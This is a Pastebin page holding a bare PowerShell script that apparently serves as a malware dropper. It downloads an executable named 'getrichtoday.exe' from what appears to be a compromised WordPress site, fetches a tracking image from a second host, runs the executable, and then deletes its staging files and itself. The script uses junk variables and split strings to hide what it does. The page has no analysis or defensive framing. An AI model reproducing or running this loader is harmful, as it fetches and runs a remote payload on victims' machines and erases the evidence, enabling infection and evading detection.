Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $ujdkwq = 'jqwdb';
- $stat = 'ht'+'tp://'+''+'savepic.su/5757956.jpg';
- $ggtt = 'http://bluemagicwarranty.com/wp-includes/theme-compat/getrichtoday.exe';
- $pths = 'C:\Users\PSPUBWS\AppData\Local\Temp\';
- $wehs = '26417';
- $nnm = '8';
- $ajsghdjas='absghjdasjgdas';
- $asdhjassad='2ygeqwgheqwgjhegqjwgqej sad';
- $down = New-Object System.Net.WebClient;
- $asdasdas='2geyu2ty1tyeu12g2eg e';
- $file = $pths+$nnm+'.exe';
- $statsfile = $pths+'444.jpg';
- $down.headers[''+'User-Agent'] = ''+'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
- $dasdw='asdgjasd';
- $down.DownloadFile($ggtt,$file);
- $down.DownloadFile($stat,$statsfile);
- $asndjkashdas='hqugdhjgqw hj2gjh1gd hj12ghej1';
- $ScriptDir = $MyInvocation.ScriptName;
- $vbsFilePath = $pths+$wehs+'.'+'v'+'bs'+'';
- $statFilePath = 'c:\Users\MM\AppData\Local\Temp\444'+'.'+'jpg';
- $btFilePath = $pths+$wehs+'.'+'b'+'at';
- $psFilePath = $pths+$wehs+'.'+'ps'+'1';
- $asdhjqgwdq='qhwgdjqwghdjqw';
- $qwbhg21jd21h='jakshdjhagsdasd';
- Start-Sleep -s 13;
- cmd.exe /c $file;
- $file1 = gci $vbsFilePath -Force
- $nqjwdhgjqwd='qvdhqgwjdgwq';
- $file2 = gci $btFilePath -Force
- $file3 = gci $psFilePath -Force
- $kasldds = $vbsFilePath
- If (Test-Path $kasldds){ Remove-Item $kasldds }
- If (Test-Path $btFilePath){ Remove-Item $btFilePath }
- If (Test-Path $statFilePath){ Remove-Item $statFilePath }
- $asbdhjags = 'jahdjkhdjk21 21hjkhe jkhsakhd assd';
- If (Test-Path $file){ Remove-Item $file }
- Remove-Item $MyINvocation.InvocationName
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement